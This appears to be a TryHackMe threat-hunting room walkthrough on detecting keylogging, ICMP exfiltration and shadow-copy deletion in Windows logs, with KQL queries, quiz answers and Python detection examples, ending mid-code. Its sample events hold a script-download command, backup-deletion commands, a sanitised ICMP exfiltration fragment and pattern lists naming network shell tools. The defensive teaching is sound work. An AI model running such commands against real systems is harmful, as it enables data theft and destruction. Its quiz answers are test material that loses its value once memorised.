# Threat Hunting: Endgame

In this room, you will learn how to implement the threat hunting process to hunt malicious activities performed in the "Actions on Objectives" phase of the "Cyber Kill Chain". You will also experience the hunting process of commonly used MITRE ATT\&CK techniques under the collection, exfiltration and impact tactics. The ultimate objective of the room is to teach how to conduct a threat hunting investigation to detect attackers' main objectives in the system.

Learning Objectives

* Gain applied hands-on threat hunting investigation skills.
* Familiarise yourself with the "Actions on Objectives" phase.
* Familiarise yourself with correlating and evaluating artefacts for a hypothesis.
* Experience the threat hunting process for a defined scope.

Room Prerequisites

* [Windows Event Logs](https://tryhackme.com/room/windowseventlogs)
* Windows Forensics [1](https://tryhackme.com/room/windowsforensics1) & [2](https://tryhackme.com/room/windowsforensics2)
* [Core Windows Processes](https://tryhackme.com/room/btwindowsinternals)
* [Sysmon](https://tryhackme.com/room/sysmon)
* [Sysinternals](https://tryhackme.com/room/btsysinternalssg)
* [MITRE](https://tryhackme.com/room/mitre)
* [Threat Emulation Module](https://tryhackme.com/module/threat-hunting)

## Toolset and Hints

**Case: Collection**

Threat hunting exercise focused on TA0009 (also known as a collection). The case example covers hunting keylogger activity.

* Available log sources
  * Security
  * Sysmon
  * Windows PowerShell
  * PowerShell Operational

**Case: Exfiltration**

Threat hunting exercise focused on TA0010 (also known as exfiltration). The case example covers hunting data exfiltration over ICMP.

* Available log sources
  * Security
  * Sysmon
  * Windows PowerShell
  * PowerShell Operational

**Case: Impact**

Threat hunting exercise focused on TA0040 (also known as impact). The case example covers hunting data destruction and manipulation via native system resources.

* Available log sources
  * Security
  * Sysmon
  * System
  * Windows PowerShell
  * PowerShell Operational

## Tactic: Collection

The collection tactic (also known as TA0009) is a set of techniques that adversaries use (or could use) to gather valuable data from the target system that could be useful for their objectives. As the target data is directly linked with the adversary's objectives, it is not always possible to identify which data type is significantly at risk. However, there are a few commonly acquired data sources that should be considered during threat hunting:

* Data that can be used for exploitation, pivoting or privilege escalation.
* Data that can be used for intelligence gathering.
* Data that can be monetised.
* Confidential data, financial records, intellectual property and personally identifiable information (PII).

Commonly used techniques are listed below:

* Man-in-the-middle
* ARP / LLMNR Poisoning
* SMB Relay
* DHCP Spoofing
* Hijacking
* Traffic dump
* Keylogging
* Input capture
* Data collection from local/cloud/repositories

The table below summarises the collection tactic (also known as TA0009).

<table data-header-hidden><thead><tr><th width="227"></th><th></th></tr></thead><tbody><tr><td>Importance<br></td><td>The actions carried out under this tactic will help the analyst understand the adversary's motivation and plans for the next steps. Focusing on this aspect could enable early detection of full compromise or impact on/over valuable data/assets.<br></td></tr><tr><td>Link to Other Tactics</td><td><p>The collection tactic is seen to be used with the following tactics:</p><ul><li>Initial Access</li><li>Lateral Movement</li><li>Exfiltration</li><li>Impact</li></ul></td></tr><tr><td>Suggestions and Best Practices Against TA0009<br></td><td><p>The following points will help security teams enhance the overall system's resilience and help threat hunters conduct more efficient and proactive hunting.<br></p><ul><li>Develop data asset inventory of valuable/sensitive data, track access controls, and audit asset/file actions.<br></li><li>Set up a continuous endpoint and network monitoring solution and configure audit logs accordingly.</li><li>Track user and account activities to identify unusual user activities.</li><li>Use DLP and UBA solutions.</li></ul></td></tr></tbody></table>

### Case Example: Hunting Keylogging

This case example demonstrates a keylogger hunting exercise. The mini scenario is hunting keylogger activity triggered by an abused administrative account or an attacker who gains an administrative shell session. Note that the pre- and post-activities are not within the scope of this hunt; the case example is directly focused on detecting keylogging activity.

Let's skim over the essential points with the "how things are working" mindset to start hunting keyloggers.

Keyloggers (also known as keystroke loggers) are tools/utilities that record all performed keyboard activities. The most common forms are implemented with direct API calls, registry modifiers, malicious driver files, customised scripts and function calls, and packed executables. Most modern security tools can detect keylogger patterns, but the ability to manually hunt malicious patterns is vital to survive on the battlefield of threat hunting.

Note that there are various procedures for implementing and detecting keyloggers. In this case, we are hunting one of the common forms of keylogger activity: API execution. The table below summarises the main characteristics of the keystroke logging approach for the given case.

<table><thead><tr><th width="257">Keystroke Log Approach</th><th>Procedure and Example</th></tr></thead><tbody><tr><td>Windows API Execution</td><td><p>Keylogging with API and function calls; common calls are listed below:</p><ul><li>GetKeyboardState</li><li>SetWindowsHook</li><li>GetKeyState</li><li>GetAsynKeyState</li><li>VirtualKey</li><li>vKey</li><li>filesCreated</li><li>DrawText</li></ul></td></tr><tr><td>Hooks</td><td><p>Keylogging with low-level hooks; common hooks are listed below:</p><ul><li>SetWindowHookEx</li><li>WH_KEYBOARD</li><li>WH_KEYBOARD_LL</li><li>WH_MOUSE_LL</li><li>WH_GETMESSAGE</li></ul></td></tr></tbody></table>

#### Base Hints

Case Index = `case_collection`

Filtering fields to investigate specific log types:

* `winlog.channel`
* `winlog.provider_name`

Starting with the given scenario and information, we will use overall search insights on process executions and pattern matches. Our hypothesis is clear; we look for keylogging actions on the given pattern scope. We will quickly check if any of the available log files have a match with any of the given patterns by using the following KQL query:

`*GetKeyboardState* or *SetWindowsHook* or *GetKeyState* or *GetAsynKeyState* or *VirtualKey* or *vKey* or *filesCreated* or *DrawText*`

<figure><img src="/files/26jHxBAtwyEDojEl1AGY" alt=""><figcaption></figcaption></figure>

Based on the results, it can be seen that there are multiple pattern matches in the given index. Implementing a quick filter also shows that the main visibility is coming from the following log file:

* `Microsoft-Windows-PowerShell/Operational`

Adding column filters shows that the file contains the suspicious patterns.

* Selected columns:
  * `winlog.channel`
  * `winlog.event_data.Path`
  * `winlog.event_data.ScriptBlockText`

<figure><img src="/files/fISSAvFuXP5iGhCPPnRF" alt=""><figcaption></figcaption></figure>

Now we have the suspicious file name and the executed code block, which reveals another suspicious file name, so let's dig deeper to understand the activities linked to the discovered files by using the following query:

* `*chrome-update_api.ps1* or *chrome_local_profile.db*`

Note that we set the following columns to increase visibility:

* `winlog.channel`
* `winlog.event_data.Path`
* `winlog.event_data.ScriptBlockText`
* `winlog.event_data.CommandLine`
* `winlog.event_data.Data.#text`

<figure><img src="/files/EQY9Q1Wv1xoiKnfs1lk6" alt=""><figcaption></figcaption></figure>

The previous results show that the suspicious PowerShell file is downloaded using the 'wget' command and executed by the user. The executed file is a script; the details are visible in the applied columns. Based on the visible script lines, we can see that the second suspicious file is the keylogger's database. Let's dig deeper to find out more details about the database file using the following query:

* `winlog.event_data.ScriptBlockText : "*chrome_local_profile.db*"`

Updating the column filters to increase visibility:

* `winlog.event_data.Path`
* `winlog.event_data.ScriptBlockText`
* `winlog.event_data.Payload`

<figure><img src="/files/EECgQteTRqXhsDFQeRhz" alt=""><figcaption></figcaption></figure>

This result gives more insight into the database file. The 'cat' command is used to list/view the contents of files, so it may be possible to see the contents of the database file and discover the logged keystrokes.

At this point, the findings could be used to build a search chain correlating the parent-child relationship of process executions to gain more insight into the suspicious script and database file. Similarly, focusing on the command execution time and digging into the following events using the `View surrounding documents` option provides a comparable view.

Required steps to do so:

* Click the upper left arrow to expand the details of the log/event.
* Click on the "View surrounding documents" link/button.

<figure><img src="/files/0sssT0yDnglYnhXB74LM" alt=""><figcaption></figcaption></figure>

This option creates a list showing the events in chronological order. Click on the `Load 5 newer documents` link/button to follow the events after the cat command has been executed. Note that the event you clicked on will be highlighted in light blue as the starting point for your search.

<figure><img src="/files/0GE3trdX9RBm1yLCNji0" alt=""><figcaption></figcaption></figure>

We expected to have a copy of the command results on the terminal, as the command output is not redirected to any file or address. That's why we focused on the executed command, time and payload details. Now, the contents of the keylogger database are fully visible!
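The two-stage hunt above (sweep the index for the pattern set, then pivot on the file names the hits expose) can be reproduced offline. The Python below is an added example, not the room's code or data: it runs the room's keylogging pattern list over a handful of constructed Winlogbeat-style events with the `winlog.*` field names used in the room, reports which channel gives the visibility, harvests file names from the hits and re-queries for them in time order, the manual equivalent of the `*chrome-update_api.ps1* or *chrome_local_profile.db*` query plus `View surrounding documents`. The events, the file names `svc-helper.ps1` and `profile_cache.db`, the PIDs and the address 198.51.100.7 are all constructed.

```python
"""Two-stage keylogger hunt over constructed Winlogbeat-style events.

Stage 1 sweeps every string field for the room's keylogging pattern set;
stage 2 pivots on the file names found in the hits. All events below are
constructed for this example and are not the room's data.
"""
import re
from collections import Counter
from typing import Dict, List, Set

Event = Dict[str, str]  # flattened Kibana-style field name -> value

# Constructed sample events; field names follow the winlog.* layout used in the room.
EVENTS: List[Event] = [
    {"@timestamp": "2023-05-10T09:00:01Z", "winlog.channel": "Security",
     "winlog.event_data.CommandLine": "powershell.exe -NoProfile",
     "winlog.event_data.ProcessId": "0x10e4"},
    {"@timestamp": "2023-05-10T09:00:05Z",
     "winlog.channel": "Microsoft-Windows-PowerShell/Operational",
     "winlog.event_data.Path": "",
     "winlog.event_data.ScriptBlockText":
         "wget http://198.51.100.7/svc-helper.ps1 -OutFile C:\\Users\\Public\\svc-helper.ps1"},
    {"@timestamp": "2023-05-10T09:00:09Z", "winlog.channel": "Windows PowerShell",
     "winlog.event_data.Data.#text":
         "HostApplication=powershell.exe -File C:\\Users\\Public\\svc-helper.ps1"},
    {"@timestamp": "2023-05-10T09:00:10Z",
     "winlog.channel": "Microsoft-Windows-PowerShell/Operational",
     "winlog.event_data.Path": "C:\\Users\\Public\\svc-helper.ps1",
     "winlog.event_data.ScriptBlockText":
         "$state = [Win32]::GetKeyState($vKey); Add-Content C:\\Users\\Public\\profile_cache.db $vKey"},
    {"@timestamp": "2023-05-10T09:03:40Z",
     "winlog.channel": "Microsoft-Windows-PowerShell/Operational",
     "winlog.event_data.Path": "",
     "winlog.event_data.ScriptBlockText": "cat C:\\Users\\Public\\profile_cache.db"},
    {"@timestamp": "2023-05-10T09:05:00Z",
     "winlog.channel": "Microsoft-Windows-Sysmon/Operational",
     "winlog.event_data.CommandLine": "notepad.exe C:\\Users\\alice\\notes.txt"},
]

# The keylogging pattern set exactly as the room writes it.
KEYLOG_PATTERNS = ["*GetKeyboardState*", "*SetWindowsHook*", "*GetKeyState*",
                   "*GetAsynKeyState*", "*VirtualKey*", "*vKey*", "*filesCreated*", "*DrawText*"]

# File names worth pivoting on: scripts, binaries and the data stores they write.
FILENAME_RE = re.compile(r"[\w\-]+\.(?:ps1|psm1|db|exe|dll|bat|vbs|js)\b", re.IGNORECASE)


def kql_wildcard_to_regex(pattern: str) -> "re.Pattern[str]":
    """Turn a KQL-style wildcard term into a regex: '*' becomes '.*', everything
    else is matched literally (case-insensitively here, for a forgiving sweep)."""
    return re.compile(".*".join(re.escape(p) for p in pattern.split("*")), re.IGNORECASE)


def hunt(events: List[Event], patterns: List[str]) -> List[Event]:
    """Return every event in which any field value matches any pattern."""
    regexes = [kql_wildcard_to_regex(p) for p in patterns]
    return [ev for ev in events
            if any(r.search(v) for k, v in ev.items() if k != "@timestamp" for r in regexes)]


def summarize_by_channel(hits: List[Event]) -> Counter:
    """The 'quick filter' step: which log channel gives the visibility."""
    return Counter(ev.get("winlog.channel", "<none>") for ev in hits)


def extract_filenames(hits: List[Event]) -> Set[str]:
    """Collect file names from Path, ScriptBlockText, CommandLine and similar fields."""
    names: Set[str] = set()
    for ev in hits:
        for k, v in ev.items():
            if k.startswith("winlog.event_data."):
                names.update(m.lower() for m in FILENAME_RE.findall(v))
    return names


def pivot(events: List[Event], filenames: Set[str]) -> List[Event]:
    """Stage 2: query the whole index for the discovered names and return the hits in
    time order, the manual equivalent of '*file1* or *file2*' plus 'View surrounding documents'."""
    hits = hunt(events, [f"*{name}*" for name in sorted(filenames)])
    return sorted(hits, key=lambda ev: ev["@timestamp"])  # ISO-8601 strings sort chronologically


def run_hunt(events: List[Event] = EVENTS) -> Dict:
    stage1 = hunt(events, KEYLOG_PATTERNS)
    names = extract_filenames(stage1)
    stage2 = pivot(events, names)
    return {"stage1_hits": len(stage1),
            "channels": dict(summarize_by_channel(stage1)),
            "pivot_files": sorted(names),
            "timeline": [(ev["@timestamp"], ev["winlog.channel"]) for ev in stage2]}


if __name__ == "__main__":
    for key, value in run_hunt().items():
        print(f"{key}: {value}")
```

Wildcard terms match literal substrings only, so a term such as `*GetAsynKeyState*` does not match a script block that calls the Win32 function `GetAsyncKeyState`; `kql_wildcard_to_regex` makes it cheap to check each term of a pattern set against the API name it is meant to catch before running the set against a live index.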

### Conclusion

Based on the results, there are multiple activities, including Chrome, PowerShell, Notepad and other system programs. After investigating the results carefully, we notice that PowerShell starts a process that leads to child processes, which download the malicious script from a remote host, log the keystrokes and create a database file in the system.

This is the simplest way of hunting keylogger activity with a given pattern set. Still, you should keep track of the detected files and processes to identify the relations between them, create a timeline and discover the logged/stolen data.

Suggestions on where to look and what to do next:

* File creation activities to detect when and how the malicious PowerShell script is created.
* Process relations to understand the start point of the adversary activity.
* Function calls to understand if the adversary opens or transfers the dump database.

### Q & A

1\) What is the Process ID of the process that downloads the malicious script?

```
*GetKeyboardState* or *SetWindowsHook* or *GetKeyState* or *GetAsynKeyState* or *VirtualKey* or *vKey* or *filesCreated* or *DrawText*
```

<figure><img src="/files/SEvyc44rpEkBa4KUECg9" alt=""><figcaption></figcaption></figure>

```
*chrome-update_api.ps1* or *chrome_local_profile.db*
```

<figure><img src="/files/AWQ5iQGmNGAFyzdjX6hA" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/XYCBDOdetN4j6nMSOXL4" alt=""><figcaption></figcaption></figure>

Answer: 3388

2\) What is the logged mail account?

```
*chrome-update_api.ps1* or *chrome_local_profile.db*
```

<figure><img src="/files/nu3BG2C3KBWEGhxCTM8M" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/EyQfG5XvCbcT1Y3ZDbfc" alt=""><figcaption></figcaption></figure>

Answer:  <hunted-victim2323@gmail.com>

## Tactic: Exfiltration

The exfiltration tactic (also known as TA0010) is a set of techniques that adversaries use (or could use) to steal or leak data from the target system/network. As the ultimate aim of the tactic is to steal/leak data, compression and encryption techniques also appear here; they are usually used to gather the maximum amount of data possible and avoid detection. The common forms of appearance of the tactic are listed below:

* Sending data out to command and control servers/channels.
* Sending data out to alternative channels by using size limits on transmission.

Commonly used techniques are listed below:

* Traffic Duplication
* Data transfer over alternative protocols
* Data transfer over encrypted/unencrypted C2 Channel
* Exfiltration over web service and cloud storage mediums
* Exfiltration over Bluetooth and portable devices

Note that the mentioned exfiltration techniques could be triggered by automation or scheduled jobs. The table below summarises the exfiltration tactic (also known as TA0010).

<table data-header-hidden><thead><tr><th width="144"></th><th></th></tr></thead><tbody><tr><td>Importance<br></td><td>The actions carried out under this tactic highlight the lost or compromised data (data breach). Hunting and understanding the details of this phase of the attack chain will help security teams detect the weaknesses and gaps in the implemented security measures. Also, understanding how the data is exfiltrated is vital to mitigate and enhance the detection/prevention ability of the system against similar data breach attempts.<br></td></tr><tr><td>Link to Other Tactics</td><td><p>As the tactic is the accomplished action on the target system and the consequence of the successful attack, it can be considered in the last part of the attack chain. Therefore, the hunter should consider the previous steps, which usually start with the following:</p><ul><li>initial access</li><li>persistence</li><li>privilege escalation and other relevant tactics required to inflict the present damage.</li></ul></td></tr><tr><td>Suggestions and Best Practices Against TA0010<br></td><td><p>The following points will help security teams enhance the overall system's resilience and help threat hunters conduct more efficient and proactive hunting.</p><ul><li>Data classification and access controls.</li><li>Improve monitoring and use of DLP solutions.</li><li>Implement data encryption for sensitive data.</li></ul></td></tr></tbody></table>

### Case Example: Data Exfiltration over ICMP

This case example demonstrates a hunting exercise for data exfiltration over ICMP. The mini scenario is hunting data exfiltration over the ICMP traffic channel by focusing on pure Windows artefacts. Note that, this time, we focus on the system and its processes instead of network traffic to get an insight into the event and learn the changes that occur at the system/process level during data exfiltration.

Note that there are various procedures for implementing exfiltration and detecting it. Typically, adversaries use system-native channels or their own command and control channel with controlled size limits to transmit/exfiltrate data. Sometimes, adversaries implement two stages of exfiltration by transferring the data to an alternative network location over an unencrypted protocol before transferring it to their dedicated and encrypted command and control channel. Network IDS and IPS solutions provide incredible detail on detecting such activities. Again, understanding the system-level processes of the scripted action is a big plus. The table below summarises the main characteristics of the common data exfiltration approach for the given case.

<table data-header-hidden><thead><tr><th width="301"></th><th></th></tr></thead><tbody><tr><td>Exfiltration Approach</td><td>Procedure and Example</td></tr><tr><td>Scripting with system tools and utilities</td><td><p>Command execution and file access activities; common calls are listed below:</p><ul><li>ping, ipconfig, arp, route, telnet</li><li>tracert, nslookup, netstat, netsh</li><li>localhost, host, smb, smtp, scp, ssh</li><li>wget, curl, certutil, net use</li><li>nc, ncat, netcut, socat, dnscat, ngrok</li><li>psfile, psping</li><li>tcpvcon, tftp, socks</li><li>Invoke-WebRequest, server, http, post, ssl, encod, chunk</li></ul></td></tr></tbody></table>

#### Base Hints

Case Index = `case_exfiltration`

Filtering fields to investigate specific log types:

* `winlog.channel`
* `winlog.provider_name`

Starting with the given scenario and information, we will use overall search insights on process executions and pattern matches. Our hypothesis is clear: we are looking for a system tool call that leads to data transfer. We will quickly check if any of the given log files have a match with any of the given patterns by using the following KQL query:

`*$ping* or *$ipconfig* or *$arp* or *$route* or *$telnet* or *$tracert* or *$nslookup* or *$netstat* or *$netsh* or *$smb* or *$smtp* or *$scp* or *$ssh* or *$wget* or *$curl* or *$certutil* or *$nc* or *$ncat* or *$netcut* or *$socat* or *$dnscat* or *$ngrok* or *$psfile* or *$psping* or *$tcpvcon* or *$tftp* or *$socks* or *$Invoke-WebRequest* or *$server* or *$post* or *$ssl* or *$encod* or *$chunk* or *$ssl*`

<figure><img src="/files/ZeWsPafQZkEIzmSECbFG" alt=""><figcaption></figcaption></figure>

There is one hit! Now, let's continue hunting with the detected system call by running this filter:

* `*System.Net.Networkinformation.ping*`

Note that we filtered the following column to reveal if any executable file is involved in the suspicious activity:

* `winlog.event_data.Path`

<figure><img src="/files/NDJ9aHlRtRIGvcGlwAsO" alt=""><figcaption></figcaption></figure>

The result shows a suspicious PowerShell script. Expand the log and look at the details. This script is transferring files using ICMP packets. In other words, it is a data exfiltration script!

Using the `View Surrounding Documents` option might give a good insight into the script, but let's run the following query to see all associated activity.

* `*icmp4data.ps1*`

Updating the column filters to increase visibility:

* `winlog.event_data.Path`
* `winlog.event_data.ScriptBlockText`

<figure><img src="/files/5zorop3dtZRmlPiLCHa3" alt=""><figcaption></figcaption></figure>

The query returns precise results to end the hunt by identifying the exfiltrating script, the exfiltrated file and the upload server!
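Once the script block is in front of you, the hunt comes down to reading four things out of it: whether it uses the .NET `System.Net.NetworkInformation.Ping` class, where `Send` points, how large each chunk is and which file is read, and from the chunk size the number of ICMP packets a file of a given size needs (the same quantities the Q & A below asks for). The Python below is an added example and not the room's `icmp4data.ps1` or its data: it extracts those parameters from a constructed, sanitised script block (the chunking loop is left out) and from a constructed benign block that uses the same class for a reachability check, so the two can be told apart. The address 203.0.113.9, the file `report_cache.db` and the chunk size 32 are placeholders.

```python
"""Triage a PowerShell script block that moves a file over ICMP with .NET's Ping class.

The script text is a constructed, sanitised sample (the chunking loop is left out);
the address, file name and chunk size are placeholders, not the room's values.
"""
import math
import re
from typing import Dict, List, Optional

# Constructed ScriptBlockText as it would appear in a PowerShell/Operational 4104 event.
SAMPLE_SCRIPT_BLOCK = r'''
$dst = "203.0.113.9"
$chunkSize = 32
$bytes = [System.IO.File]::ReadAllBytes("C:\Users\Public\report_cache.db")
$ping = New-Object System.Net.NetworkInformation.Ping
# chunking loop elided in this constructed sample
$ping.Send($dst, 1000, $chunk) | Out-Null
'''

# Constructed benign block: an ordinary reachability check with the same class.
BENIGN_SCRIPT_BLOCK = r'''
$ping = New-Object System.Net.NetworkInformation.Ping
$reply = $ping.Send("intranet.example.test")
if ($reply.Status -eq "Success") { Write-Output "up" }
'''

PING_CLASS_RE = re.compile(r"System\.Net\.NetworkInformation\.Ping", re.IGNORECASE)
SEND_CALL_RE = re.compile(r"\.Send\(\s*([^,\)]+)", re.IGNORECASE)  # first argument of Send()
READ_FILE_RE = re.compile(r'ReadAllBytes\(\s*"([^"]+)"', re.IGNORECASE)
CHUNK_RE = re.compile(r"\$(\w*chunk\w*)\s*=\s*(\d+)", re.IGNORECASE)  # numeric chunk-size assignment


def resolve_string_var(script: str, token: str) -> Optional[str]:
    """A literal comes back unquoted; a $variable is resolved to its string assignment."""
    token = token.strip()
    if not token.startswith("$"):
        return token.strip("\"'")
    m = re.search(r"\$" + re.escape(token[1:]) + r"\s*=\s*[\"']([^\"']+)[\"']", script)
    return m.group(1) if m else None


def defang(host: str) -> str:
    """Report indicators in the 10[.]10[.]x[.]x style the room uses, so they are not clickable."""
    return host.replace(".", "[.]")


def analyze_script_block(script: str, file_size: Optional[int] = None) -> Dict:
    """Pull the exfiltration parameters a hunter needs from one script block."""
    uses_ping = bool(PING_CLASS_RE.search(script))
    send = SEND_CALL_RE.search(script)
    dest = resolve_string_var(script, send.group(1)) if send else None
    chunk = CHUNK_RE.search(script)
    chunk_size = int(chunk.group(2)) if chunk else None
    src = READ_FILE_RE.search(script)
    # ceil(file size / chunk) is the number of packets the sender needs for a file of that size.
    packets = math.ceil(file_size / chunk_size) if file_size and chunk_size else None
    return {
        "uses_dotnet_ping": uses_ping,
        "destination": defang(dest) if dest else None,
        "chunk_size": chunk_size,
        "source_file": src.group(1) if src else None,
        "expected_packets": packets,
        # Ping plus a file read plus a fixed chunk size is the exfiltration shape; a bare Send is not.
        "suspicious": uses_ping and chunk_size is not None and src is not None,
    }


def triage(script_blocks: List[str], file_size: Optional[int] = None) -> List[Dict]:
    """Analyse every block and keep the ones that look like ICMP exfiltration."""
    return [r for r in (analyze_script_block(s, file_size) for s in script_blocks) if r["suspicious"]]


if __name__ == "__main__":
    for finding in triage([SAMPLE_SCRIPT_BLOCK, BENIGN_SCRIPT_BLOCK], file_size=1000):
        print(finding)
```

The `expected_packets` figure is what you compare against the ICMP volume seen from the host in the same window; a match between the two ties the script, the file and the network activity together, which is the correlation the conclusion below asks you to make.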

### Conclusion

Based on the results, it can be seen that the discovered script is used for exfiltrating data over the ICMP protocol. Unlike the previous hunt, no prior indicator of downloading the exfiltration script exists. It was most likely created by the adversary or planted with a different technique.

This is the simplest way of hunting data exfiltration with system native tools over unencrypted channels. Still, you should investigate the query results to deepen and enrich your findings. Identify how the script works and which data is exfiltrated.

**Suggestions on where to look and what to do next:**

* Exfiltration script analysis (how it works).
* Exfiltration destination.
* Connections made to the exfiltration destination.

### Q & A

1\) What is the total number of sent ICMP packets?

```
*$ping* or *$ipconfig* or *$arp* or *$route* or *$telnet* or *$tracert* or *$nslookup* or *$netstat* or *$netsh* or *$smb* or *$smtp* or *$scp* or *$ssh* or *$wget* or *$curl* or *$certutil* or *$nc* or *$ncat* or *$netcut* or *$socat* or *$dnscat* or *$ngrok* or *$psfile* or *$psping* or *$tcpvcon* or *$tftp* or *$socks* or *$Invoke-WebRequest* or *$server* or *$post* or *$ssl* or *$encod* or *$chunk* or *$ssl*
```

<figure><img src="/files/1IbaIxTGqt8k5NDFTjBe" alt=""><figcaption></figcaption></figure>

```
*System.Net.Networkinformation.ping*
```

<figure><img src="/files/BAgal1Rua1GF0bGno8dK" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/GSJ9MDkcNdIA4MwNQCer" alt=""><figcaption></figcaption></figure>

Answer:  21

2\) How many bytes (chunk) is the amount of data carried in each packet?

```
*icmp4data.ps1*
```

<figure><img src="/files/fvNi5Usk9bGhKnxgbx1f" alt=""><figcaption></figcaption></figure>

Answer:  15

3\) What is the name of the exfiltrated document?

<figure><img src="/files/9tgXCjSsFgP0eQgabSBl" alt=""><figcaption></figcaption></figure>

Answer:  chrome\_local\_profile.db

4\) Answer:  10\[.]10\[.]87\[.]116

## Tactic: Impact

The Impact tactic (also known as TA0040) is a set of techniques that adversaries use (or could use) to disrupt availability, hinder expected functionality and compromise integrity through data destruction, disruption or manipulation. Since each adversary has different purposes, a hunter should consider as many possibilities as possible over valuable data or system resources. Sometimes, adversaries alter the data while making all processes look fine during exploitation. Therefore, hunting the impact part of the attack chain requires close attention to find the needle in the haystack. The common forms of appearance of the tactic are listed below.

* Ransomware
* File destruction and removal
* Data manipulation

Commonly used techniques are listed below:

* Interrupting system environment by modifying primary settings
  * Account manipulation
  * Access manipulation
  * Network configuration
* Data destruction, disruption and manipulation
* Data encryption
* Defacement
* Service destruction

The table below summarises the impact tactic (also known as TA0040).

<table data-header-hidden><thead><tr><th width="182"></th><th></th></tr></thead><tbody><tr><td>Importance<br></td><td>The actions carried out under this tactic are consequences of the successful attack. Hunting and understanding the details of this phase of the attack chain will help security teams detect the weaknesses and gaps in the implemented security measures. Understanding this phase is vital to mitigate the risks and enhance the detection/prevention ability of the system against similar threats.<br></td></tr><tr><td>Link to Other Tactics</td><td>Like the exfiltration tactic, the impact tactic can be considered in the last part of the attack chain. So, considering the previous steps and creating use case examples after the hunt is essential.</td></tr><tr><td>Suggestions and Best Practices Against TA0040<br></td><td><p>The following points will help security teams enhance the overall system's resilience and help threat hunters conduct more efficient and proactive hunting.</p><ul><li>Conduct regular risk assessments, threat hunting and penetration testing.</li><li>Implement in-depth hardening and zero-trust model (where possible).</li><li>Improve the visibility and monitoring.</li><li>Prepare and implement incident response and disaster recovery plans.</li></ul></td></tr></tbody></table>

### Case Example: Data Disruption/Manipulation

This example demonstrates a hunting exercise for data destruction and recovery manipulation over native system processes. The mini scenario is hunting shadow backup removal and system recovery point corruption, in the same way the Olympic Destroyer APT group does.

Note that there are various procedures for implementing system disruption/manipulation and detecting it. Typically, adversaries use native system utilities to evade security products and stay undetected. While ransomware is one of the first things that comes to mind, it is not always used for indirect, long-term system disruption goals; such silent goals are less visible but have a similar impact. The table below summarises the main characteristics of the common data disruption approach for the given case.

<table data-header-hidden><thead><tr><th width="257"></th><th></th></tr></thead><tbody><tr><td>Disruption Approach</td><td>Procedure and Example</td></tr><tr><td>Scripting with system tools and utilities</td><td><p>Command execution and file access activities; common calls are listed below:</p><ul><li>del, rm</li><li>vssadmin, wbadmin</li><li>bcdedit, wevutil</li><li>shadow, recovery, bootstatuspolicy</li></ul></td></tr></tbody></table>

#### Base Hints

Case Index = `case_impact`

Filtering fields to investigate specific log types:

* `winlog.channel`
* `winlog.provider_name`

Starting with the given scenario and information, we will use overall search insights on process executions and pattern matches. Our hypothesis is clear: We are looking for a system tool call that leads to system disruption and data manipulation. We will quickly check if any of the given log files match with any of the given patterns by using the following KQL query:

`*del* or *rm* or *vssadmin* or *wbadmin* or *bcdedit* or *wevutil* or *shadow* *recovery* or *bootstatuspolicy*`

<figure><img src="/files/ywXc3264FqsI8mQiKAjr" alt=""><figcaption></figcaption></figure>

The raw results are hard to gain insight from. Let's visualise them by log source and decide where to focus first.

* Click on the following field and choose the visualise option:
  * `winlog.channel`
* Then, select the table format.

<figure><img src="/files/MucCvhlWt3PFzX9VaB7k" alt=""><figcaption></figcaption></figure>

As we are looking for system native tools, the Security log could provide the low-hanging fruit. Let's return to our main filter and add the Security log as a log source filter.

<figure><img src="/files/sz5jOG3ZFPY56w34vlid" alt=""><figcaption></figcaption></figure>

The time field can help us highlight the first command executed. However, we still need to identify the actual starting point of the action. Let's focus on the first suspicious event by filtering on its Process ID without narrowing the search by log source.

* `winlog.event_data.ProcessId : "1972"`

Updating the column filters to increase visibility:

* `winlog.event_data.CommandLine`
* `winlog.event_data.ParentProcessName`
* `winlog.event_data.ProcessId`
* `winlog.event_data.ParentProcessId`
* `winlog.event_data.ParentImage`

This query provides results that are clear enough to explore and correlate the parent-child process relationship. So, the parent process is found and visible with all the nested details you need!
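The parent-child correlation described in the steps above is a tree walk: index the process creation events by PID, start from the suspicious command and follow `ParentProcessId` upwards until the log runs out, then pick the outermost shell in that chain as the "main shell image". The Python below is an added example that does not use the room's dataset: it rebuilds the chain from constructed Sysmon-style process creation events with the `winlog.event_data.*` field names used in this case, flags the command lines carrying the disruption tokens, and resolves each parent as the latest creation event for that PID that is not after the child's own creation, which keeps a later reuse of the same PID from hijacking the chain. PIDs, paths and timestamps are constructed.

```python
"""Parent-child process chain reconstruction over constructed process creation events.

Walks from a suspicious command back to the shell that started the chain. All
PIDs, paths and timestamps are constructed for this example, not the room's data.
"""
from typing import Dict, List, Optional

Event = Dict[str, str]  # flattened winlog.* field name -> value


def proc(ts: str, pid: str, image: str, cmd: str, ppid: str, pimage: str) -> Event:
    """Build a Sysmon-style (event ID 1) process creation record."""
    return {"@timestamp": ts, "winlog.event_data.ProcessId": pid, "winlog.event_data.Image": image,
            "winlog.event_data.CommandLine": cmd, "winlog.event_data.ParentProcessId": ppid,
            "winlog.event_data.ParentImage": pimage}


SYS32 = "C:\\Windows\\System32\\"
PS = SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe"
EXPLORER = "C:\\Windows\\explorer.exe"
# Constructed sample: an interactive shell spawns cmd, which runs the backup-tampering tools.
PROCESS_EVENTS: List[Event] = [
    proc("2023-05-11T14:00:00Z", "4100", EXPLORER, "C:\\Windows\\Explorer.EXE", "900", SYS32 + "userinit.exe"),
    proc("2023-05-11T14:02:10Z", "5204", PS, "powershell.exe -NoProfile", "4100", EXPLORER),
    proc("2023-05-11T14:02:31Z", "6040", SYS32 + "cmd.exe", "cmd.exe /c vssadmin.exe delete shadows", "5204", PS),
    proc("2023-05-11T14:02:31Z", "7120", SYS32 + "vssadmin.exe", "vssadmin.exe delete shadows", "6040", SYS32 + "cmd.exe"),
    proc("2023-05-11T14:02:33Z", "7304", SYS32 + "wbadmin.exe", "wbadmin.exe delete catalog", "6040", SYS32 + "cmd.exe"),
    proc("2023-05-11T14:10:00Z", "3000", SYS32 + "notepad.exe", "notepad.exe", "4100", EXPLORER),
    # PID 5204 reused much later by an unrelated process: a naive PID lookup would pick this one.
    proc("2023-05-11T14:30:00Z", "5204", SYS32 + "calc.exe", "calc.exe", "4100", EXPLORER),
]

# Tokens based on the room's impact pattern set (wevtutil spelled as the binary is). '*del*' and
# '*rm*' are left out: as bare substrings they match far too many unrelated command lines.
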